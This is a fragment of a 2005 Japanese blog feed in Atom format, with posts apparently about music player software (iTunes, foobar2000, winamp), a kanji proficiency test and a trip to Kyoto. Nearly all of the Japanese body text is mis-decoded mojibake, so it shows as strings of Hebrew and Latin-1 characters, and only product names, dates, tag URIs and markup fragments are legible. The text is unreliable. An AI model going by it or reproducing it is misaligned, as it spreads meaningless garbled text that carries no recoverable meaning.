    -¼ך₪־₪ׂ₪י₪עײ₪·₪¿₪ט₪¦₪¡¢₪³₪־₪¢₪ך₪µ₪₪ֿ¡³(¡­¡¼¡®)¥־
    -ֵֵµ¡¥ב¡¼¥«¡¼₪ֿ₪³₪¾₪ֳ₪ֶ¡¢£ם£נ£³¥׳¥ל¡¼¥ה¡¼₪ֻ¼ט₪ךֱָ₪ף₪ַ₪×₪י₪ל₪₪¹¡£

    - -

    ipodֵ׀¾ל₪־₪×₪«₪²₪ַ₪¹₪ֽ¡£
    -iTunes Music Store₪־¥ְ¥¦¥ף¥ם¡¼¥ֹ¿פ₪ֿ¡¢5²¯¶ֶַֻֽ¡£²£°£°£µַ¯£··מ¡ֻ¡£
    -ּ₪«₪ל₪׀₪½₪ל₪ַ₪₪₪₪₪ף₪ְ¡£ּ₪¸ְֽױ₪ַ₪ֿ¡¢¥׃¥¸¥ֽ¥¹¥ג¥ַ¥כ₪־ְֱֿ¸₪ָ₪ג₪₪₪¦¡£
    -₪ָ₪₪₪¦₪«¡¢₪₪₪₪₪־₪«₪¡¢₪³₪ף₪₪ף₪ַ¡¢₪ָ₪ג₪ֱ₪ח₪ֳ₪ָ»׳₪₪₪₪¹₪±₪ֹ¡£
    -¡ִ¥₪¥י¥¯ְןֱט₪ֶָ±₪¸¥³¥ף¥»¥׳¥ָ₪ַ₪₪₪₪ט₪¦₪µ₪₪¬₪·₪₪₪₪ַ₪ג₪₪₪₪ַ₪ג₪₪₪₪ַ₪¹¡£

    - -

    ₪¡¢₪ָ₪ג₪¢₪ל¡¢₪¢₪־£ױ£ַ₪£ם£נ£³₪¬¡¢₪³₪ף₪₪ֻ²¡¹₪·₪₪ֲ¸÷₪ֻ₪₪ֳ₪¿₪ָ₪ֿ¡¢₪₪ף₪ָ₪ֻ³ײְ₪₪־´¶₪¬₪¢₪ך₪₪¹¡£³ײְ₪₪ָ₪₪₪ֳ₪ֶ₪ג¡¢½½ַ¯₪ג₪¿₪ֳ₪ֶ₪₪₪₪־₪¬¡¢₪¹₪´₪₪ְ₪³¦₪ַ₪¹¡£¥¥׳¥¹¥¿₪ג±ף₪¯₪₪ך₪ֻ₪±₪ך¡£

    - -

    ₪µ₪ֶ¡¢¥ׁ¥½¥³¥ף₪ַ²»³ִ°₪¯₪ָ₪­¡¢₪ֹ₪ף₪¥½¥ױ¥ָ»ָ₪ן₪ל₪ֶ₪₪¹₪ַ₪·₪ח₪¦¡©
    -iTunes₪ה£׳£ֽ£׀₪ָ₪«₪ַ₪·₪ח₪¦₪«¡£winamp₪ע»ָ₪ן₪ל₪ֶ₪כ‎₪גֲ¿₪₪₪־₪ַ₪·₪ח₪¦₪«¡£

    - -

    ₪ֹ₪־¥½¥ױ¥ָ₪¬²»₪¬־ֹ₪₪₪־₪ַ₪·₪ח₪¦¡£

    - -

    ¡ײ₪₪₪₪²»¡׳₪ֳ₪ֶ¡¢ֶס₪·₪₪₪ַ₪¹¡£
    -¡ײְלּח²ָ¡׳₪¬־ֹ₪₪₪ָ₪₪₪ֳ₪ֶ₪¯₪ל₪כ₪ג₪־₪¬¡¢ֹ¬₪÷₪·₪ג¼«¬₪ֻ₪ָ₪ֳ₪ֶ¡ײ₪₪₪₪¡׳₪ָ₪ֿ¸ֲ₪י₪₪₪¡£
    -₪¿₪ף₪ֻ²»¶ֱ³״ֵ×₪־ֹ₪µ₪ְ₪±₪¸₪ד₪₪¯₪ֶ¡¢ִ°₪¯¥¸¥ד¥ף¥כ₪₪ף₪«₪ג´״·¸₪¬₪¢₪כ¡£ִ°₪­‎₪ג¡¢£ֲ£ַ£ֽ₪ָ₪·₪ֶ¹₪­־®₪¹₪־₪ָ¡¢ְִֵ°₪¹₪כ₪־₪ַ₪ֿ₪ֱ₪¬₪¦₪ַ₪·₪ח₪¦¡£
    -¥¹¥װ¡¼¥«¡¼₪ה¥¢¥ף¥׳¡¢₪×ֹפ²°₪־»ִ¶ֱ₪־¶ס¹ח¡¢₪½₪ף₪·ף₪ֽ¹ח₪₪₪ג₪¢₪כ₪ָ¸ְ₪ן₪ל₪₪¹¡£₪¿₪₪₪״₪ף¾®ֶס₪·₪₪ְ₪³¦₪ַ₪¹¡£
    -÷ַ¸ו₪ֿ¡¢¼«¸ֻ‏ֲ­¡¦¼«¸÷ֵּ²₪ג₪ָ₪ֶ₪ג½ֵֽ׳(¾׀)

    - -

    »ה₪ֿ¡¢÷£₪ֿfoobar2000₪ע»ָ₪¦₪³₪ָ₪¬ֲ¿₪₪₪ַ₪¹¡£₪¢₪ָApollo¡¢₪ָ₪­₪¿₪winamp¡with Shibatch mpg123¥׳¥י¥°¥₪¥ף ²‏°­¥׀¡¼¥¸¥ח¥ף¡ֻ¡£
    -foobar₪ֿ¡¢₪¹₪´₪¯¥«¥¹¥¿¥¥₪¥÷₪ַ₪­₪₪¹¡£ֽ‎·ֿ¹¥₪£ק¡¡
    -¥׳¥י¥°¥₪¥ף₪עֽרֽׁ₪·₪ֶ¡¢₪₪₪ם₪₪₪ם»ָ₪₪¾¡¼ך₪ט₪¯₪ַ₪­₪₪¹¡£₪¦₪ֱ₪ֿ₪₪₪ם₪ף₪¥¸¥ד¥ף¥כ₪־ֲח־ּ₪־³¶₪¬₪¢₪כ₪־₪ַ¡¢₪µ₪¯₪µ₪¯ֱ×¶₪ַ₪­₪ֶ¡¢₪ָ₪ֶ₪ג״ֽר₪ַ₪¹¡£

    - -

    °ֱ°₪ֿ₪₪₪ם₪ף₪¥׳¥ל¡¼¥ה¡¼₪ע»מ₪·₪¿₪₪¡¡£¡£
    -²»₪¬₪₪₪₪₪ָ₪₪₪ן₪ל₪כ₪־₪ֿ¡¢Sound Player Lilith ₪ָ₪« Audioactive Player¡£
    -Audioactive ₪ֿ¡¢¸ֵ₪₪¥½¥ױ¥ָ₪ַ₪¹₪¬¡¢₪ׂ₪ח₪ֳ₪ָ₪¹₪כ₪ָ÷£₪ַ₪ג₪₪₪ֱ₪׀₪ף²»₪¬₪₪₪₪₪«₪ג¡£₪ַ₪גµ¡ַ½₪¬¾¯₪₪₪₪־₪¬ֶסְֵ¡£₪₪₪ה¡¢¥₪¥ף¥¿¡¼¥ױ¥¡¥₪¥¹₪¬ְהֻ¾ֵ×₪ֻ¥ְ¥µ₪₪₪³₪ָ₪ע₪־₪¾₪±₪׀¡£
    -¥½¥ױ¥ָ₪ֻ₪ט₪ֳ₪ֶ¡¢₪¿₪·₪«₪ֻ₪÷₪₪₪ײ₪ף²»₪ֿ₪ֱ₪¬₪₪₪₪¹¡£¥ַ¥ױ¥©¥כ¥ָ₪־²»₪־ִ´ְ°₪־»ֵ‎₪ג₪¢₪כ¡£

    - -

    ₪ג₪ֳ₪ָ₪ֱ₪¬₪¦₪־₪ֿ¡¢£ֳ£ִ₪־²»¸»₪ע¥ׁ¥½¥³¥ף₪ֻ¼ט₪ך¹‏₪א₪ָ₪­¡£¥ך¥ֳ¥װ¥ף¥°₪ָ¥¨¥ף¥³¡¼¥ֹ¡£
    -£ֳ£ִ£ו£ר₪ָ£ּ£ֱ£ֽ£ֵ₪ע»ָ₪ֳ₪ֶ₪₪¹¡££ֵ£ֱ£ֳ₪ג₪ָ₪­₪ֹ₪­¡£
    -iTunes₪ַ¼ט₪ך¹‏₪ף₪ַ₪×₪י₪ל₪כ₪«₪¿₪¬₪×₪י₪ל₪¿₪י¡¢₪½₪ל₪ֿ₪ג₪¦¡ײ²¿₪ע₪ה₪ֳ₪ָ₪כ₪ף₪¸₪ד¡¢₪³₪־¥¥±¥ֳ₪¬₪¡¡׳₪¶«₪׃₪ע₪³₪ב₪ִ₪ִ¡¢₪×₪÷₪×₪÷₪ָ£ּ£ֱ£ֽ£ֵ₪ע₪×₪¹₪¹₪ב₪·₪¿₪₪₪ַ₪¹¡£₪¢₪«₪י₪µ₪₪ֻ²»₪¬₪ֱ₪¬₪¦₪־₪ַ₪¹¡£
    -₪¿₪ְ¡¢£ּ£ֱ£ֽ£ֵ₪ֿ±₪¬¿¼₪¯₪ֶ¡¢₪½₪ל₪ֿ₪ג₪¦ֳֿ¹צ₪־₪ט₪¦₪ֻ±₪¬¿¼₪₪₪ַ₪¹¡£
    -¥ֽ¿½¡¢₪ָ₪«₪¬₪×₪י₪ל₪כְ»°ט₪ַ₪¹¡£¥³¥¥ף¥ֹ¥י¥₪¥ף¥×¥׳¥·¥ח¥ף₪ֻ₪ִ₪₪₪ֶ¡¢÷£ֵ¡¢»°ֶ»°ָױ¸ל₪ךְּ₪«₪·₪₪·₪ח₪¦¡£¥׀¡¼¥¸¥ח¥ף¥¢¥ֳ¥׳₪¹₪כ₪¿₪׃¡¢²»₪־´¶₪¸₪¬ׁ₪ן₪ך₪₪¹¡£₪ֹ₪¦₪·₪¿₪י₪₪₪₪₪«¡¢₪₪ף₪ָ₪ֿ₪ג₪¦¡¢₪ט₪¯₪ן₪«₪י₪₪₪₪ַ₪¹¡£¥ֽ¥ֳ¥ָ₪ַ¥ֶ¥­¥ָ¡¼₪¶µֱִֽֽ₪ע¸«₪ִ₪±₪ֶ₪ֿ¡¢¸ְ₪ן₪ל₪¿₪₪₪ֻ½¾₪ֳ₪ֶ₪₪₪₪¹¡£

    - -

    ²»³¹¥₪­₪ְ₪±₪ֹ¡¢¥ׁ¥½¥³¥ף₪ֻ₪ֿ₪₪ֹ₪₪ֹ₪ֻ₪·₪«¾₪·₪¯₪₪₪¿ֽ¡¹¡¢₪ֹ₪₪₪₪·₪ֶ₪×₪י₪ל₪₪¹₪ַ₪·₪ח₪¦₪«¡£
    -»ה₪ֿ÷ַ¶ב¡¢¥ױ¥י¥ב¥ף¥³₪ע¹₪¯₪³₪ָ₪¬ֲ¿₪₪₪־₪ַ₪¹₪¬¡¢¥ױ¥י¥ב¥ף¥³¡¢₪ֹ₪¦₪·₪¿₪י₪ט₪¯ִ°₪±₪כ₪־₪ְ₪ם₪¦¡£¥¢¥ף¥ְ¡¢¥¢¥ל¥£¡¢¥¢¥ֻ¡¼¥ג¡×
    -

    ]]> -
    -
    - - ¶ּ»ׂ₪«₪±₪´ָ׃₪־·ן - - 2005-11-28T10:44:57Z - 2005-11-28T19:44:57+09:00 - tag:www.overcube.com,2005:/blog//2.664 - 2005-11-28T10:44:57Z - ₪×־ֱֽ‎¥ֽ¥¿¡£־ֱֽ‎₪־¼ּ¿¿₪ֿ¡¢₪ְ₪₪₪ײ»£₪ך₪¿₪ב₪ֶ₪¢₪כ₪ג₪־₪־¡¢µ­»צ₪ע½ס₪¯₪־₪¬₪ֱ₪ח₪ֳ₪ָ²¯¹ו¡£ ֱ°₪ֿ¡¢¥¢¥µ¥ך₪־¼ע¾ר₪·₪־µ­»צ₪ע¥¢¥ֳ¥׳₪·₪¿₪±₪ֹ¡¢₪³₪ף₪₪ן₪«₪ך₪­₪ֳ₪¿־ֱֽ‎₪־¥ל¥·¥װ₪ע¡¢₪ה₪¿₪י־ְֿג₪·₪ֶ₪₪₪כ¼«¬₪¬ָב₪·₪₪₪ַ₪¹¡¾׀¡ֻ ²¿₪עִ¹¡¹₪ָ½ס₪₪₪ֶ₪₪₪כ₪ף₪ְ¡¢¼«¬¡£ ₪·₪«₪·¡£ ₪ֹ₪¦₪ה₪י¡¢₪½₪ל₪ֿ¹ֽ₪¨°ד₪₪₪ְ₪ֳ₪¿₪ט₪¦₪ַ₪¹¡£ ₪א₪·₪ם¡¢₪₪ְ₪₪ְ־ְֿג₪¬ֲ­₪ך₪₪₪¡£µ­»צ₪גֳ»₪¹₪®₪כ¡£ ₪½₪ל₪ֿ¡¢₪¹₪₪ן₪ֱ¡¢־ֱֽ‎₪״₪־°¦¾נ₪¬¡¢₪₪ְ₪₪ְֳזֵ׃ָ¾ֳ¼₪ְ₪«₪י₪ְ¡£ ₪½₪¦¹ֽ₪¨₪ע²‏₪ב₪¿₪־₪ֿ¡¢₪³₪ל₪ע¸«₪ֶ₪·₪₪ֳ₪¿₪«₪י¡£ ¢£ֽס₪«₪±₪´ָ׃ - Wikipedia ¶¸₪ֳ₪ֶ₪כ₪¹₪׀₪י₪·₪₪₪ַ₪¹¡£°·ֱ°־¶ָ₪ַ₪¹¡£ּ¼¡₪ְ₪±°תֽׁ₪¹₪כ₪ָ¡£ּ¼¡ 1 ÷מ₪ך‎ 2 ¿©₪‎ 3 ֶֻ₪־¿©¸²½₪־ֳז₪ַ₪־°ֳּײ₪ֵ₪± 3.1 ־ע»ֻ 4 ֽס₪־ְ¸¿© 5 ֽס₪«₪±₪´₪ֿ₪ף₪ָ·ע¹¯ 5.1 ±ֹֽ 5.2 ¥¢¥ל¥כ¥®¡¼ 6 ֽֽ¡¹₪ֽס₪«₪±₪´₪ֿ₪ף 6.1 ¥ָ¥ֳ¥װ¥ף¥° 6.2 ִ´ּ£־ֱ 7 ´״ֿ¢¥₪¥¥ף¥ָ 8 ´״ֿ¢»ס־ֱ 9 ´״ֿ¢»צ¹א... - - overQ - - - - cook - - ₪×־ֱֽ‎¥ֽ¥¿¡£־ֱֽ‎₪־¼ּ¿¿₪ֿ¡¢₪ְ₪₪₪ײ»£₪ך₪¿₪ב₪ֶ₪¢₪כ₪ג₪־₪־¡¢µ­»צ₪ע½ס₪¯₪־₪¬₪ֱ₪ח₪ֳ₪ָ²¯¹ו¡£
    -ֱ°₪ֿ¡¢¥¢¥µ¥ך₪־¼ע¾ר₪·₪־µ­»צ₪ע¥¢¥ֳ¥׳₪·₪¿₪±₪ֹ¡¢₪³₪ף₪₪ן₪«₪ך₪­₪ֳ₪¿־ֱֽ‎₪־¥ל¥·¥װ₪ע¡¢₪ה₪¿₪י־ְֿג₪·₪ֶ₪₪₪כ¼«¬₪¬ָב₪·₪₪₪ַ₪¹¡¾׀¡ֻ
    -²¿₪עִ¹¡¹₪ָ½ס₪₪₪ֶ₪₪₪כ₪ף₪ְ¡¢¼«¬¡£

    - -

    ₪·₪«₪·¡£

    - -

    ₪ֹ₪¦₪ה₪י¡¢₪½₪ל₪ֿ¹ֽ₪¨°ד₪₪₪ְ₪ֳ₪¿₪ט₪¦₪ַ₪¹¡£
    -₪א₪·₪ם¡¢₪₪ְ₪₪ְ־ְֿג₪¬ֲ­₪ך₪₪₪¡£µ­»צ₪גֳ»₪¹₪®₪כ¡£
    -₪½₪ל₪ֿ¡¢₪¹₪₪ן₪ֱ¡¢־ֱֽ‎₪״₪־°¦¾נ₪¬¡¢₪₪ְ₪₪ְֳזֵ׃ָ¾ֳ¼₪ְ₪«₪י₪ְ¡£

    - -

    ₪½₪¦¹ֽ₪¨₪ע²‏₪ב₪¿₪־₪ֿ¡¢₪³₪ל₪ע¸«₪ֶ₪·₪₪ֳ₪¿₪«₪י¡£

    - -

    ¢£ֽס₪«₪±₪´ָ׃ - Wikipedia

    - -

    ¶¸₪ֳ₪ֶ₪כ₪¹₪׀₪י₪·₪₪₪ַ₪¹¡£°·ֱ°־¶ָ₪ַ₪¹¡£ּ¼¡₪ְ₪±°תֽׁ₪¹₪כ₪ָ¡£

    ּ¼¡
    -1 ÷מ₪ך‎
    -2 ¿©₪‎
    -3 ֶֻ₪־¿©¸²½₪־ֳז₪ַ₪־°ֳּײ₪ֵ₪±
    -3.1 ־ע»ֻ
    -4 ֽס₪־ְ¸¿©
    -5 ֽס₪«₪±₪´₪ֿ₪ף₪ָ·ע¹¯
    -5.1 ±ֹֽ
    -5.2 ¥¢¥ל¥כ¥®¡¼
    -6 ֽֽ¡¹₪ֽס₪«₪±₪´₪ֿ₪ף
    -6.1 ¥ָ¥ֳ¥װ¥ף¥°
    -6.2 ִ´ּ£־ֱ
    -7 ´״ֿ¢¥₪¥¥ף¥ָ
    -8 ´״ֿ¢»ס־ֱ
    -9 ´״ֿ¢»צ¹א
    -10 ³°ֹפ¥ך¥ף¥¯
    ְט·מ₪ֻ₪ֿ¡¢¡ײֲט1²ף¡¦ֶֻ₪¿₪₪´₪«₪±₪´₪ֿ₪ף¥·¥ף¥¥¸¥¦¥א¡׳₪ָ₪₪₪¦₪ט₪¦₪¥₪¥¥ף¥ָ₪גֵח÷¬₪ַ₪×₪³₪₪ן₪ל₪ֶ₪₪₪¿₪ט₪¦₪ַ₪¹¡£

    - -

    ₪ֹ₪¦₪ה₪י°לֹפ₪ַ₪ֿ¡¢₪¿₪₪₪״₪ףְ¹₪ך¾ו₪¬₪ֳ₪ֶ₪כ₪י₪·₪₪¡£₪¿₪₪´₪«₪±₪´ָ׃¡£
    -ֳ־₪י₪₪«₪ֳ₪¿¡ִ¡£ֳ־₪י₪₪«₪ֳ₪¿₪־₪ֿ»ה₪ְ₪±¡©
    -₪₪ף₪ְ₪«÷ַ¶ב¡¢¥ֻ¥ֳ¥¥ף₪ֻ₪¦₪₪¯₪₪¸₪ב₪ּ₪ַ₪¹¡ִ¡£

    - -

    ¢£µז¶ֻ₪־¶ּ»ׂ₪«₪±₪´ָ׃₪עµב₪ב₪ֶ
    -¢£¶ּ»ׂ₪´₪ֿ₪ף¥ל¥·¥װ

    - -

    ¡־ִֹµ­¡ֿ
    -₪½₪־¸ו¡¢¿ֽ₪«₪י¹₪₪₪¿₪ָ₪³₪ם₪ַ₪ֿ¡¢₪ה₪ֳ₪ׁ₪ך¶ּ»ׂ₪«₪±₪´ָ׃₪ֿ¡¢¥ײ¡¼¥א₪י₪·₪₪¡£÷£ִ«₪ג₪ָ₪¯¥ְ¥ֽ¡×₪ַ¼ט₪ך¾ו₪²₪ֶ₪₪₪¿₪ָ¸ְ₪¦¡£₪ָ₪¯¥ְ¥ֽ¡×₪ט₪ך₪ֱֿב₪«₪ֳ₪¿₪ן₪±₪ַ₪¹₪¡£¾¡₪ֳ₪¿₪ט¡¢¾®ֱׂ₪µ₪ף¡£
    -ֲ¼₪×₪³₪·₪־¥׳¥ם¥¸¥§¥¯¥ָ₪ָ₪·₪ֶ¡¢¶ּ»ׂ₪«₪±₪´ָ׃¥ײ¡¼¥א₪ֿ»ֵ³₪±₪י₪ל₪¿¡¢₪ָ₪₪₪¦₪³₪ָ₪י₪·₪₪¡£
    -₪½₪¦₪₪₪¨₪׀¡¢³ֵ·₪ִַ´₪₪ֶ₪כ₪ָ¡¢ִ¶¹גµי¶ּ»ׂ₪ֿ¡¢₪ה₪¿₪י₪ָµ‏ֵװֹ₪־₪ג₪־¡ָ‏»³ִ®₪ָ₪«¡ֻ₪¬ֲ¿₪«₪ֳ₪¿₪ַ₪¹¡£
    -¾¼ֲֿ¥ײ¡¼¥א₪ָ₪ג¥·¥ף¥¯¥ם₪·₪ֶ₪כ₪ף₪ַ₪·₪ח₪¦₪ֽ¡£₪¿₪₪´₪«₪±₪´ָ׃¡£

    - -


    -

    -

    -¶ּ»ׂ₪«₪±₪´₪ֿ₪ףְלֽׁ₪·₪ח₪¦ּ‎
    -
    -
    -

    -

    -ֶֻ°ל¡ײ₪³₪ְ₪ן₪ך₪¿₪₪´¡׳
    -

    ]]> - -
    -
    - - ½©₪־µ‏ֵװ¡¦ֻג³¦׃ - - 2005-11-26T12:44:54Z - 2005-11-26T21:44:54+09:00 - tag:www.overcube.com,2005:/blog//2.663 - 2005-11-26T12:44:54Z - ÷£ֶ₪ֿ¡¢ֵּג₪ֻ₪ט₪כָז±ֳ»³½יֵ׀ִ÷₪ְֻ®¸ש₪₪₪¿₪·₪₪·₪¿¡£ ₪¿₪₪₪״₪ף¡¢₪­₪ִ₪«₪ֳ₪¿₪ַ₪¹¡£ »‏´ײֵ×₪ֻ₪ֶֿף»‏´ײ¼ו₪¯₪י₪₪₪ַ₪·₪¿₪¬¡¢÷ה₪¬µ₪₪³₪ָµ₪₪³₪ָ¡£ µ׳₪·₪ײ₪ך₪ֲֻ­₪¬ְֻ₪ֻ₪₪ך₪₪·₪¿¡£₪³₪ל₪«₪י°ל½µ´ײ₪¯₪י₪₪¡¢¶ֶשִֻ₪ֻ¶ל₪·₪ב₪י₪ל₪כ₪«₪ָ»׳₪¦₪ָ¡¢₪ֱ₪ח₪ֳ₪ָ₪״₪³₪א(¡­ֽ¡®¡¨) ½₪³״±¡¡¦±ְל÷ה₪«₪יֵ׀₪ך₪₪·₪¿¡£ ֵ׃ֳז₪־¸«ְ²₪י₪·₪־₪₪₪₪¾ל½ך₪ַ₪ֿ¡¢₪³₪־₪ט₪¦₪½©»³₪־ְה·₪ג¸«₪×₪ם₪»₪₪¹¡£ ₪­₪י₪י÷ה₪ֿ¡¢₪א₪«₪·₪«₪יֽרֽׁ₪µ₪ל₪ֶ₪­₪¿ֵ׀»³ֶ»¡£₪·₪«₪·°ל‎₪ַ₪ֿ¡¢₪¢₪₪¿₪־·לֵֹ₪י₪ל₪¿־ע»ֻ₪ע»‎₪ִֶ»₪ַ₪ג₪¢₪ך₪₪¹¡£ ¥¯¥כ¥₪ה¥±¡¼¥ײ¥כ¡¢¥ם¡¼¥׳¥¦¥§¥₪₪ַ²¿₪־µ₪₪₪·₪ֵֻ׀₪ֳ₪ֶ₪כ₪ָ₪­₪ֿµ₪₪ֵ₪«₪ל₪כ₪³₪ָ₪־₪₪₪¡¢·ל₪־₪ֻ₪×₪₪₪־₪¹₪כָז±ֳ»³₪־־¢₪־´י₪ע¡¢³ְ´ײ¸«₪ֶ₪·₪₪ֳ₪¿₪«₪ג₪·₪ל₪₪»₪ף¡£¡£ ¡תַֻ₪י₪ל₪¿·כ³¦ ֵ׃ֳז₪₪ַ¡¢ֳז¹ס¿ֽ₪־¥«¥ֳ¥׳¥כ₪ֱָ°¸ו₪·₪ֵֶ׀₪ֳ₪ֶ₪₪₪₪·₪¿¡£ ¸«ְ²ֲז₪ע₪¹₪®₪¿₪¢₪¿₪ך₪ַ¡¢ֱֶֽ³¡¢½ק₪־₪₪¦₪¬ֲח₪­₪ְ¼₪ַ¡ֳז¹ס¿ֽ₪ֿ₪ָ₪ֻ₪«₪¯ְ¼₪¬¥ַ¥«₪₪¡ֻ¡¢ֳֻ₪־₪₪¦₪ֳֻֿ₪·₪«₪±»ֿ₪ב₪₪·₪¿¡£ ¥±¥ף¥«₪ַ₪ג₪¹₪כ₪־₪«₪ָ»׳₪ֳ₪¿₪י¡¢µ₪ֻ°ת₪­ײ₪·₪ֶ₪₪₪­₪₪¹¡£... - - overQ - - - - kyoto - - ÷£ֶ₪ֿ¡¢ֵּג₪ֻ₪ט₪כָז±ֳ»³½יֵ׀ִ÷₪ְֻ®¸ש₪₪₪¿₪·₪₪·₪¿¡£

    - -

    ₪¿₪₪₪״₪ף¡¢₪­₪ִ₪«₪ֳ₪¿₪ַ₪¹¡£
    -»‏´ײֵ×₪ֻ₪ֶֿף»‏´ײ¼ו₪¯₪י₪₪₪ַ₪·₪¿₪¬¡¢÷ה₪¬µ₪₪³₪ָµ₪₪³₪ָ¡£
    -µ׳₪·₪ײ₪ך₪ֲֻ­₪¬ְֻ₪ֻ₪₪ך₪₪·₪¿¡£₪³₪ל₪«₪י°ל½µ´ײ₪¯₪י₪₪¡¢¶ֶשִֻ₪ֻ¶ל₪·₪ב₪י₪ל₪כ₪«₪ָ»׳₪¦₪ָ¡¢₪ֱ₪ח₪ֳ₪ָ₪״₪³₪א(¡­ֽ¡®¡¨)

    - -

    ְה·

    - -

    ½₪³״±¡¡¦±ְל÷ה₪«₪יֵ׀₪ך₪₪·₪¿¡£
    -ֵ׃ֳז₪־¸«ְ²₪י₪·₪־₪₪₪₪¾ל½ך₪ַ₪ֿ¡¢₪³₪־₪ט₪¦₪½©»³₪־ְה·₪ג¸«₪×₪ם₪»₪₪¹¡£

    - -

    ₪­₪י₪י÷ה₪ֿ¡¢₪א₪«₪·₪«₪יֽרֽׁ₪µ₪ל₪ֶ₪­₪¿ֵ׀»³ֶ»¡£₪·₪«₪·°ל‎₪ַ₪ֿ¡¢₪¢₪₪¿₪־·לֵֹ₪י₪ל₪¿־ע»ֻ₪ע»‎₪ִֶ»₪ַ₪ג₪¢₪ך₪₪¹¡£
    -¥¯¥כ¥₪ה¥±¡¼¥ײ¥כ¡¢¥ם¡¼¥׳¥¦¥§¥₪₪ַ²¿₪־µ₪₪₪·₪ֵֻ׀₪ֳ₪ֶ₪כ₪ָ₪­₪ֿµ₪₪ֵ₪«₪ל₪כ₪³₪ָ₪־₪₪₪¡¢·ל₪־₪ֻ₪×₪₪₪־₪¹₪כָז±ֳ»³₪־־¢₪־´י₪ע¡¢³ְ´ײ¸«₪ֶ₪·₪₪ֳ₪¿₪«₪ג₪·₪ל₪₪»₪ף¡£¡£

    - -

    »״₪µ₪¹₪ג₪־₪ֿ

    - -

    ¡תַֻ₪י₪ל₪¿·כ³¦

    - -

    ֵ׃ֳז₪₪ַ¡¢ֳז¹ס¿ֽ₪־¥«¥ֳ¥׳¥כ₪ֱָ°¸ו₪·₪ֵֶ׀₪ֳ₪ֶ₪₪₪₪·₪¿¡£
    -¸«ְ²ֲז₪ע₪¹₪®₪¿₪¢₪¿₪ך₪ַ¡¢ֱֶֽ³¡¢½ק₪־₪₪¦₪¬ֲח₪­₪ְ¼₪ַ¡ֳז¹ס¿ֽ₪ֿ₪ָ₪ֻ₪«₪¯ְ¼₪¬¥ַ¥«₪₪¡ֻ¡¢ֳֻ₪־₪₪¦₪ֳֻֿ₪·₪«₪±»ֿ₪ב₪₪·₪¿¡£
    -¥±¥ף¥«₪ַ₪ג₪¹₪כ₪־₪«₪ָ»׳₪ֳ₪¿₪י¡¢µ₪ֻ°ת₪­ײ₪·₪ֶ₪₪₪­₪₪¹¡£
    -

    ]]> - ½קְ­₪ֿ¸±₪·₪₪´י₪ע₪·₪ֶ¡¢ֹ₪₪₪ג₪־₪ַ₪ג¸«₪¿₪ט₪¦₪ֻ¡¢ֱבֲ­₪ַ»³₪ע¹₪ך₪ֶ₪₪₪­₪₪·₪¿¡£
    -¡ִ₪·₪׀₪י₪¯¹װ₪¯₪ָ¡£

    - -

    ·כ³¦¡¢ַֻ₪ל₪כ

    - -

    ´י₪¬÷ױ₪«₪ל₪¿©ֱ₪¬₪¢₪ך₪₪·₪¿¡£¸ֵ₪₪₪ג₪־₪ַ₪¹¡£¹ג₪µ»ֽ½½¥»¥ף¥ֱ₪¯₪י₪₪¡£¥₪¥¹¥י¥א¶µֵּ₪־»ֵ¶ָ₪ַ₪·₪ח₪¦₪«¡£

    - -

    ¾פׁכ·כ³¦ָך

    - -

    ©ֱ₪־ֶֿ₪«₪י¡¢±₪ֻ¿­₪׃₪כֶ»₪¬₪¢₪ך¡¢¿₪ף₪ַ₪₪₪¯₪ָ¡¢¡ײ¾פׁכ·כ³¦¡׳₪ֱָֹ₪«₪ל₪¿ְ׀ָך₪¬¡£
    -·כ³¦¡©
    -₪ַ₪ג¡¢©ֱ₪־´י¡¢÷ױ₪«₪ל₪ֶ₪₪¹₪¬¡£

    - -

    ₪¿₪₪₪״₪ף¡¢ֹװ°ֲ₪µ₪»‎₪ֱ₪ֻ₪₪ך₪₪·₪¿¡£
    -ַֻ₪י₪ל₪¿·כ³¦¡£
    -ָז±ֳ»³₪ֿ¹ס²ֳִָ¸מ₪־»³₪ַ₪¢₪ך¡¢£±£²£°£°ַ¯₪ֻ₪ן₪¿₪ֳ₪ֶµ‏ֵװ₪־µ´ּח₪ע₪ױ₪µ₪₪₪ַ₪­₪¿₪ֿ₪÷₪₪־₪ַ₪¹¡£
    -µ‏¶ֶֻ²₪ֻף¹נ₪»₪ֽ₪׀¡£

    - -


    -¡תּ¶פ¾ו¿ֽ

    - -

    ₪ֿ₪¡¡¢₪ֿ₪¡¡¢₪ֿ₪¡¡¢₪ֿ₪¡¡£
    -¹׃₪₪ֲ©₪ע₪ִ₪­₪₪¬₪י¡¢ֹ¬»א₪ַ»³₪עֵ׀₪ֳ₪ֶ₪₪₪₪·₪¿¡£
    -¸ב¸וֶף»‏ֱ°₪¯₪י₪₪₪־₪³₪ָ₪ַ₪·₪ח₪¦₪«¡£»³₪־ֳז₪ֿ°ֵ₪«₪ֳ₪¿¡£ֶ»₪ֿ÷₪¯₪ֶµ¡£
    -₪³₪³₪ֿ¡¢₪ֹ₪³₪־¡¢÷ֶ»₪¸₪ד¡£

    - -

    ·ל₪־¿§₪־¹ָֽױ

    - -

    ּ¡¹₪ֿ¹ָֽױ₪·₪ֶ₪₪₪₪¹¡£
    -₪·₪«₪·¡¢ָ‏₪·₪₪₪ָ₪₪₪¦₪ט₪ך₪ֿ¡¢¿´₪₪·₪«¡¢₪₪¬₪₪¬₪·₪₪¡£₪×₪ֹ₪ם₪×₪ֹ₪ם₪·₪₪¡£·ל₪־¿§¡£
    -·כ³¦₪־ַֻ₪לּ₪«₪י¡¢²¿₪«ֹװµָ₪₪ג₪־₪¬¿¯ֶ‏₪·₪ֶ₪₪₪כ₪־₪ַ₪ֿ₪₪₪₪ְ₪ם₪¦₪«¡©

    - -

    ֹװ°ױ₪ֻ¡¢₪ן₪­ֶ»₪«₪י¡¢ֿ·¿ֽ₪¬½׀₪ֶ₪­₪¿¡£
    -¡ײ₪³₪ֳ₪ֱ₪־₪₪¦₪ֿ¡¢₪₪ֻ₪«₪¢₪כ₪ף₪ַ₪¹₪«₪¡©¡׳
    -₪ָ¿ײ₪ֽ₪ֶ₪­₪₪¹¡£
    -ֿ·¿ֽ₪¬½׀₪ֶ₪­₪¿₪־₪ֿ¡¢₪ן₪­ֶ»₪ָ₪₪₪ֳ₪ֶ₪ג¡¢½ֳֶ»¡£ֿ·¿ֽ₪¬½׀₪ֶ₪³₪₪±₪ל₪׀¡¢₪½₪³₪ֶֻ»₪¬₪¢₪כ₪ָµ₪₪ֵ₪«₪₪«₪ֳ₪¿¡£
